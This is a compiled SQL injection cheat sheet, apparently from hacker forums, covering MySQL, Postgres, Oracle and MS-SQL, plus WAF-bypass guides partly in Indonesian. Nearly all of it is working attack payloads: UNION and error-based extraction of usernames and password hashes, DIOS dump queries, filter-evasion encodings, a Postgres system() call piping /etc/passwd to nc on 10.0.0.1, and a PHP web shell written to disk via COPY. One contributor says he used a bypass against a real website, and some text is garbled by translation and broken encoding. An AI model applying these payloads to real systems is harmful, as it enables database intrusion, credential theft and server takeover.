1022List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
1023List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
1024Current Database SELECT database()
1025List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
1026SELECT distinct(db) FROM mysql.db — priv
1027List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
1028List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
1029Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
1030Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
1031SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
1032Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
1033Bitwise AND SELECT 6 & 2; # returns 2
1034SELECT 6 & 1; # returns 0
1035ASCII Value -> Char SELECT char(65); # returns A
1036Char -> ASCII Value SELECT ascii(‘A’); # returns 65
1037Casting SELECT cast(’1′ AS unsigned integer);
1038SELECT cast(’123′ AS char);
1039String Concatenation SELECT CONCAT(‘A’,'B’); #returns AB
1040SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
1041If Statement SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
1042Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
1043Avoiding Quotes SELECT 0×414243; # returns ABC
1044Time Delay SELECT BENCHMARK(1000000,MD5(‘A’));
1045SELECT SLEEP(5); # >= 5.0.12
1046Make DNS Requests Impossible?
1047Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
1048Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
1049SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
1050Hostname, IP Address SELECT @@hostname;
1051Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
1052Delete Users DROP USER test1; — priv
1053Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
1054Location of DB files SELECT @@datadir;
1055Default/System Databases information_schema (>= mysql 5.0)
1056mysql
1057
1058------------------------------------------
1059Postgres SQL Injection Cheat Sheet
1060Version SELECT version()
1061Comments SELECT 1; –comment
1062SELECT /*comment*/1;
1063Current User SELECT user;
1064SELECT current_user;
1065SELECT session_user;
1066SELECT usename FROM pg_user;
1067SELECT getpgusername();
1068List Users SELECT usename FROM pg_user
1069List Password Hashes SELECT usename, passwd FROM pg_shadow — priv
1070Password Cracker MDCrack can crack PostgreSQL’s MD5-based passwords.
1071List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
1072List DBA Accounts SELECT usename FROM pg_user WHERE usesuper IS TRUE
1073Current Database SELECT current_database()
1074List Databases SELECT datname FROM pg_database
1075List Columns SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
1076List Tables SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,â€) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
1077Find Tables From Column Name If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
1078Select Nth Row SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
1079SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
1080Select Nth Char SELECT substr(‘abcd’, 3, 1); — returns c
1081Bitwise AND SELECT 6 & 2; — returns 2
1082SELECT 6 & 1; –returns 0
1083ASCII Value -> Char SELECT chr(65);
1084Char -> ASCII Value SELECT ascii(‘A’);
1085Casting SELECT CAST(1 as varchar);
1086SELECT CAST(’1′ as int);
1087String Concatenation SELECT ‘A’ || ‘B’; — returnsAB
1088If Statement IF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.
1089Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
1090Avoiding Quotes SELECT CHR(65)||CHR(66); — returns AB
1091Time Delay SELECT pg_sleep(10); — postgres 8.2+ only
1092CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken from here .
1093Make DNS Requests Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):
1094SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
1095Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.netâ€.
1096Command Execution CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user
1097Local File Access CREATE TABLE mydata(t text);
1098COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user
1099…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time
1100…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …
1101DROP TABLE mytest mytest;Write to a file:
1102CREATE TABLE mytable (mycol text);
1103INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
1104COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user. Generally you won’t be able to write to the web root, but it’s always work a try.
1105– priv user can also read/write files by mapping libc functions
1106Hostname, IP Address SELECT inet_server_addr(); — returns db server IP address (or null if using local connection)
1107SELECT inet_server_port(); — returns db server IP address (or null if using local connection)
1108Create Users CREATE USER test1 PASSWORD ‘pass1′; — priv
1109CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time
1110Drop Users DROP USER test1; — priv
1111Make User DBA ALTER USER test1 CREATEUSER CREATEDB; — priv
1112Location of DB files SELECT current_setting(‘data_directory’); — priv
1113SELECT current_setting(‘hba_file’); — priv
1114Default/System Databases template0
1115template1
1116
1117-----------------------------------------------
1118ORACLE SQL INJECTION CHEAT SHEET
1119
1120Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
1121SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
1122SELECT version FROM v$instance;
1123Comments SELECT 1 FROM dual — comment
1124– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
1125Current User SELECT user FROM dual
1126List Users SELECT username FROM all_users ORDER BY username;
1127SELECT name FROM sys.user$; — priv
1128List Password Hashes SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked
1129SELECT name,spare4 FROM sys.user$ — priv, 11g
1130Password Cracker checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
1131List Privileges SELECT * FROM session_privs; — current privs
1132SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
1133SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
1134SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
1135List DBA Accounts SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
1136Current Database SELECT global_name FROM global_name;
1137SELECT name FROM v$database;
1138SELECT instance_name FROM v$instance;
1139SELECT SYS.DATABASE_NAME FROM DUAL;
1140List Databases SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
1141– Also query TNS listener for other databases. See tnscmd (services | status).
1142List Columns SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
1143SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
1144List Tables SELECT table_name FROM all_tables;
1145SELECT owner, table_name FROM all_tables;
1146Find Tables From Column Name SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
1147Select Nth Row SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
1148Select Nth Char SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
1149Bitwise AND SELECT bitand(6,2) FROM dual; — returns 2
1150SELECT bitand(6,1) FROM dual; — returns0
1151ASCII Value -> Char SELECT chr(65) FROM dual; — returns A
1152Char -> ASCII Value SELECT ascii(‘A’) FROM dual; — returns 65
1153Casting SELECT CAST(1 AS char) FROM dual;
1154SELECT CAST(’1′ AS int) FROM dual;
1155String Concatenation SELECT ‘A’ || ‘B’ FROM dual; — returns AB
1156If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
1157Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
1158SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
1159Avoiding Quotes SELECT chr(65) || chr(66) FROM dual; — returns AB
1160Time Delay BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
1161SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow
1162SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
1163SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
1164– Also see Heavy Queries to create a time delay
1165Make DNS Requests SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
1166SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
1167Command Execution Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. :-(
1168Local File Access UTL_FILE can sometimes be used. Check that the following is non-null:
1169SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
1170Hostname, IP Address SELECT UTL_INADDR.get_host_name FROM dual;
1171SELECT host_name FROM v$instance;
1172SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
1173SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
1174Location of DB files SELECT name FROM V$DATAFILE;
1175Default/System Databases SYSTEM
1176SYSAUX
1177
1178~rkx
1179
1180Basic filter
1181
1182----------------------------
1183
1184*** Comments
1185
1186‘ or 1=1#
1187
1188‘ or 1=1– -
1189
1190‘ or 1=1/* (MySQL < 5.1)
1191
1192' or 1=1;%00
1193
1194' or 1=1 union select 1,2 as `
1195
1196' or#newline
1197
11981='1
1199
1200' or– -newline
1201
12021='1
1203
1204' /*!50000or*/1='1
1205
1206' /*!or*/1='1
1207
1208*** Prefixes
1209
1210+ – ~ !
1211
1212‘ or –+2=- -!!!’2
1213
1214*** Operators
1215
1216^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE,
1217
1218RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
1219
1220*** Whitespaces
1221
1222+ %09 %0a %0b %0c %0d %a0 /**/
1223
1224‘or+(1)sounds/**/like“1“–%a0-
1225
1226load_file/*foo*/(0×616263)
1227
12280x82 ( low single comma )
1229
1230%82
1231
1232%uff00 %c0%20 %c0%a0 %e0%80%a0 %u0028 %uff08 %c0( %c0%a8 %e0%80%a8 %u0029 %uff09 %c0) %c0%a9 %e0%80%a9
1233
1234-Ph.h4rh4r
1235
1236FOR POSTGRE 8.4 >
1237
1238(select+array_to_string(array_agg(concat(table_name,'::',column_name)::text),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$informatio​n_schema$$,$$pg_catalog$$))
1239
12402.FOR POSTGRE 9.1>
1241
1242(select+string_agg(concat(table_name,'::',column_name),$$%3Cli%3E$$)from+informa​tion_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalo​g$$))
1243
12443. ALL VERSION
1245(select+array_to_string(array(select+table_name||':::'||column_name::text+from+i​nformation_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$)),'%3Cli%3E'))
1246
12474.
1248'Asero ::: '||version()||'<br>'||(SELECT array_to_string(array(SELECT('===>'||T0ltable_name||' :: '||column_name)::text FROM information_schema.columns where table_schema='public'),'<br>'))
1249
1250~Asero
1251
1252
1253Oracle SQL Injection and DIOS query (Ph.h4rh4r)
1254
1255http://www.site.it/pages.php?p=cut-linear') order by 3--&lang=it
1256
1257No Error
1258
1259http://www.site.it/pages.php?p=cut-linear') order by 4--&lang=it
1260
1261No Error
1262
1263http://www.site.it/pages.php?p=cut-linear') order by 5--&lang=it
1264
1265Error
1266
1267http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,NULL,NULL,NULL from dual--&lang=it
1268
1269ctrl+u (view-source:)
1270
1271view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select '1111',NULL,NULL,NULL from dual--&lang=it
1272
1273view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,'1111',NULL,NULL from dual--&lang=it
1274
1275view-source:}
1276
1277<meta name="description" content="11111" />
1278
1279<meta name="description" content="1" />
1280
1281}
1282
1283'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--'
1284
1285(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--'
1286
1287http://www.site.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
1288
1289(select banner from v$version where rownum=1)
1290
1291
1292SQL injection using the xml function extractvalue() to extract data (Ph.h4rh4r)
1293
12941 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
1295
1296Result:
1297
1298'Xpath syntax error: 5.5.9:user@localhost'
1299
13002 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--
1301
1302Result:
1303
1304'Xpath syntax error: :users'
1305
13063 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--
1307
1308Result:
1309
1310'Xpath syntax error: :username'
1311
13124 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--
1313
1314Result:
1315
1316'Xpath syntax error: :password'
1317
13185 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--
1319
1320Result:
1321
1322'Xpath syntax error: :Admin:password1'
1323
1324OR
1325
13266 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users limit 1,1)))--
1327
1328Source: GOOGLE.COM
1329
1330Sekarang saya akan menunjukkan bagaimana mem-bypass filter WAF.
1331
1332Sebelum Semua pastikan Anda memiliki pengetahuan dalam SQLi.
1333
1334Ok Mari Mulai ..
1335
1336Apa itu WAF atau Aplikasi Web Firewall>?
1337-A firewall aplikasi web (WAF) adalah alat, plugin server, atau filter yang menerapkan seperangkat aturan ke percakapan HTTP. Umumnya, aturan-aturan ini mencakup serangan umum seperti Cross-site Scripting (XSS) dan SQL Injection. Dengan menyesuaikan aturan untuk aplikasi Anda, banyak serangan dapat diidentifikasi dan diblokir. Upaya untuk melakukan kustomisasi ini dapat menjadi signifikan dan perlu dipertahankan karena aplikasi dimodifikasi.
1338
1339Beberapa situs web menggunakan filter WAF.
1340Jika Anda menemukan situs vuln yang memiliki waf dan Anda mencoba untuk menyuntikkan permintaan berbasis Union dan Pertunjukannya Tidak Dapat Diterima, 403 terlarang atau Aplikasi Web FIrewall ALERT..Itulah berarti permintaan atau sintaks yang disuntikkan adalah Filter atau Diblokir oleh WAF.
1341
1342Ok sekarang inilah beberapa metode untuk Bypass filter WAF.
1343
13441) Komentar:
1345
1346Komentar SQL adalah berkat bagi kita SQL injector. Mereka memungkinkan kita untuk melewati banyak pembatasan firewall aplikasi Web dan untuk membunuh pernyataan SQL tertentu untuk mengeksekusi perintah penyerang saat mengomentari pertanyaan sah yang sebenarnya. Beberapa komentar di SQL:
1347
1348//,? , / ** /, #,? +,? -,;
1349
13502) Mengubah Kasus:
1351
1352Beberapa WAF? S hanya akan menyaring serangan huruf kecil. Seperti yang bisa kita lihat, kita dapat dengan mudah menghindarinya dengan mengubah huruf besar-kecil:
1353Kemungkinan filter Regex:
1354
1355/ union \ sselect / g
1356id = 1 + UnIoN / ** / SeLeCT, atau dengan XSS -> alert (1)
1357
13583) Komentar Inline:
1359
1360Beberapa kata kunci filter WAF seperti / union \ sselect / ig Kita dapat mem-bypass filter ini dengan menggunakan komentar inline sebagian besar waktu, Contoh yang lebih kompleks akan memerlukan pendekatan yang lebih canggih seperti menambahkan kata kunci SQL yang selanjutnya akan memisahkan dua kata:
1361
1362id = 1 / *! UnIoN * / SeLeCT
1363
1364Perhatikan tanda seru / *! Kode * / Tanda seru mengeksekusi pernyataan SQL kami.
1365Komentar sebaris dapat digunakan di seluruh pernyataan SQL sehingga jika table_name atau information_schema disaring, kita dapat menambahkan lebih banyak komentar sebaris. Sebagai contoh, mari kita berpura-pura sebuah situs menyaring serikat, di mana, table_name, table_schema, =, dan information_schema .. Ini adalah 3 pernyataan yang kita perlukan untuk menyuntikkan target kita.
1366Untuk ini kami akan:
1367
1368id = 1 / *! UnIoN * / + SeLeCT + 1,2, concat (/ *! table_name * /) + FrOM /*information_schema*/.tables / *! WHERE * / + / *! TaBlE_ScHeMa * / + like + database ()? -
1369
1370Kode di atas akan melewati filter. Perhatikan kami dapat menggunakan? Suka? bukannya? =?
1371Cara lain untuk menggunakan comemnts inline, ketika semuanya tampak gagal Anda dapat mencoba untuk melalui aplikasi Firewall off dengan menyusun pernyataan SQL menggunakan variabel:
1372
1373id = 1 + UnIoN / * & a = * / SeLeCT / * & a = * / 1,2,3, database ()? -
1374
1375Kode di atas harus melewati Union + pilih filter bahkan ketika komentar inline umum tidak bekerja dengan sendirinya
1376
13774) Buffer Overflow: / Masukan yang tidak terduga:
1378
1379Banyak WAFS ditulis dalam bahasa C yang membuat mereka cenderung meluap atau bertindak berbeda ketika dimuat dengan sekelompok data. Berikut adalah WAF yang melakukan tugasnya dengan benar, tetapi ketika diberikan sejumlah besar Data memungkinkan permintaan dan respons jahat.
1380
1381id = 1 dan (pilih 1) = (Pilih 0xAAAAAAAAAAAAAAAAA 1000 lebih A? s) + UnIoN + SeLeCT + 1,2, versi (), 4,5, database (), gunakan r (), 8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26
1382, 27,28,29,30,31,32,33,34,35,36? +
1383
1384Pemintas ini di atas berfungsi. Saya sendiri baru saja menggunakan ini terhadap situs Web baru-baru ini.
1385
13865) Kata kunci yang diganti (preg_replace dan / atau WAF? S dengan tindakan yang sama
1387
1388Terkadang dan aplikasi akan menghapus semua kata kunci. Sebagai contoh, katakanlah kita memiliki filter yang menggantikan serikat pilih dengan spasi. Kita bisa memotong filter itu seperti ini:
1389
1390id = 1 + UNIunionON + SeLselectECT + 1,2,3?
1391
1392Seperti yang Anda lihat setelah union + select telah dihapus modal kami UNION + SELECT mengambil tempat yang berhasil menyuntikkan permintaan kami:
1393
1394UNION + PILIH + 1,2,3?
1395
13966) Pengkodean karakter:
1397
1398Kebanyakan WAF akan memecahkan kode dan menyaring masukan aplikasi, tetapi beberapa WAF hanya men-decode input sekali sehingga pengkodean ganda dapat melewati filter tertentu karena WAF akan men-decode input sekali kemudian menyaring sementara Aplikasi akan terus mendekode pernyataan SQL mengeksekusi kode kita.
1399Contoh enkode ganda:
1400
1401id = 1% 252f% 252a * / UNION% 252f% 252a / SELECT% 252f% 252a * / 1,2, kata sandi% 252f% 252a * / FROM% 252f% 252a * / Pengguna? +
1402[# Tut By Pain006]
1403
1404©
1405~ h
1406
1407
1408Bypass AQTRONIX WebKnight Filter IIS
1409
1410http://www.site.com?id=1 and (2)=(s%elect convert(int,@@version))
1411
1412http://www.site.com?id=1 and (2)=(s%elect convert(int,DB_N%AME()))
1413
1414sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4
1415
1416sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5
1417
1418sql.php?id=2/**/union/**/select/**/1,2,3,4,5
1419
1420sql.php?id=2+union+%0A+select+1,2,3,4,5
1421
1422sql.php?id=2+/*%00*/+union+select+1,2,3,4,5
1423
1424/?a=1+union/*&b=*/select+1,2
1425
1426/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users
1427
1428-Ph.h4rh4r
1429
1430400,403,404,406
1431ERROR BYPASS
1432--------------------
1433
1434%55nion/**/%53elect
1435
1436id=null%0A/**//*!50000%55nIOn*//*yoU*/all/**/%0A/*!%53eLEct*/%0A/*AAA*/+1,2,3--+
1437
1438500
1439ERROR BYPASS
1440--------------------
1441
1442and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+1,2,3--+
1443
1444**NOTE: if you are in IE,and its ASP site,and you get error 500,goto chrome.**
1445
14461064
1447ERROR BYPASS
1448--------------------
1449
1450/**/Union/**/Select/**/
1451
1452uniunionon+selselectect
1453
1454id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
1455
1456if you get error 1064 like:
1457
1458...syntax to use near 'union select 1,2,3,4,5,6,7,8,9' at line 1...
1459
1460its version 3,use this one
1461
1462+or+1+group+by+concat(concat_ws(0x7c,version(),database(),user()),floor(rand(0)*?2))+having+min(0)+or+1--+-
1463
1464
1465Error Based Injection
1466---------------------
1467Error based injection is deployed on databases which is powered by MS-SQL.
1468
1469Database: MY-SQL : PHP
1470MS-SQL : .asp or .aspx
1471
1472Probelm with Error Based Injection for a Hacker
1473-----------------------------------------------
14741. Version() and database() not works!!
1475Solution : @@version
1476
14772. You can not call all the tables from the given database through information_schema.
1478
14793. You cannot extract columns of your target table in a go.
1480
1481Why it is known as Error Based Injection
1482-----------------------------------------
1483It means you will get the data in an error.
1484
1485Target : vulnweb.com : It is practice framework from a company called Acunetix.
1486
1487It has all MY-SQL and MS-SQL technology attack practices.
1488
1489Step 1: Get any GET method in the URL of the website. I.e We have to look for any SOmethoing=Something.
1490http://testasp.vulnweb.com/showforum.asp?id=0
1491
1492Step 2: Check the exception handling.
1493http://testasp.vulnweb.com/showforum.asp?id=0'
1494
1495Step 3: Check the conditions required for further attack.
1496http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;
1497
1498NOte : Error Based Injection works on LIFO rule. Last in First out.
1499
1500For Example: If we have a database with tables like followings
1501threads -> 1
1502teacher->2
1503classes->3
1504fee->4
1505users->5
1506
1507Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and
15081=convert(int,(select top 1 table_name from information_schema.tables));
1509
1510Got Table : 'threads' X
1511http://testasp.vulnweb.com/showforum.asp?id=0 and
15121=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));
1513
1514Target : 'users'
1515
1516Step 5: Get the respective columns of the users table
1517http://testasp.vulnweb.com/showforum.asp?id=0 and
15181=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));
1519
1520Target Column : uname, upass
1521
1522Step 6: Get the uname and upass
1523http://testasp.vulnweb.com/showforum.asp?id=0 and
15241=convert(int,(select top 1 upass from users));
1525
1526uname:admin
1527upass: none
1528
1529~h
1530
1531
1532D I O S B Y P A S S
1533
1534DIOS MRFMR
1535concat(0x494e4a454354204259204d522e464d52,0x3c62723e,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/)
1536
1537DIOS MRFMR WAF
1538/*!00000concat*/(0x3C666F6E7420666163653D224963656C616E6422207374796C653D22636F6C6F723A7265643B746578742D736861646F773A307078203170782035707820233030303B666F6E742D73697A653A33307078223E496E6A6563746564206279204D722E464D5220782054333735344B315431203C2F666F6E743E3C62723E3C62723E3C666F6E7420636F6C6F723D626C61636B2073697A653D353E44622056657273696F6E203A20,version(),0x3c62723e44622055736572203a20,user(),0x3C62723E2053796D203A,@@HAVE_SYMLINK,0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
1539
1540DIOS WAF
1541(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
1542
1543DIOS SULE
1544Concat(0x3c43656e7465723e,0x3c466f6e7420436f6c6f723d22526564223e,0x3c62723e,0x3c62723e,0x3c62723e,0x3c62723e,0x4696e6a6563746564206279202e2f53756c6547616e73,0x3c62723e,0x3c62723e,0x566572736920,0x3a,Version(),0x3c62723e,0x446174616261736520,0x3a,Database(),0x3c62723e,0x5573657220,0x3a,User(),@C:=0x00,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,Column_Name)),0x00,0x00),@c,0x3c2f466f6e743e,0x3c2f43656e7465723e)
1545
1546DUMP
1547(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(namadb.namatable)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)
1548
1549(/*!50000SELECT(@x*/)/*!50000FROM*/(/*!50000SELECT(@x:=0x00*/) ,(/*!50000SELECT(@x*/)/*!50000FROM*/(miat_web2014.tbladmin)/*!50000WHERE*/(@x)/*!50000IN*/(@x:=/*!50000CONCAT*/(0x20,@x,adminName,0x7e,adminpass,0x3c62723e))))x)
1550
1551LOKOMEDIA
1552'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
1553
1554DIOS WAF MOD SECURITY
1555/*!50000CONCAT*/(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,version/***/(),0x3c62723e,database/**/(),0x3c62723e,user/**/(),@C:=0x3c62723e,If((/!50000Select*/+Count()+/!50000From*/+/*!50000Information_Schema*/.Columns+/*!50000Where*/+Table_Schema=database/***/()+And+@C:=/!50000CONCAT*/(@C,0x3c62723e,/*!50000Table_Name*/,0x3a,0x3a,0x3a,0x3a,/*!50000Column_Name*/)),0x3a,0x00),@C)
1556
1557~hl
1558
1559
1560Beberapa injector hanya memakai query bypass tanpa menganalisa bagian kata yg di block oleh WAF ( Web Aplication Firewall )
1561
1562Sebelum nya Testing dlu :D
1563
1564kalau Order by ga work . coba pakai group+by :D
1565
1566http://www.webshit.com/vulnscript.php?id=1+order+by+1--+-
1567
1568http://www.webshit.com/vulnscript.php?id=1+group+by+1--+-
1569
1570----------------------------------------
1571
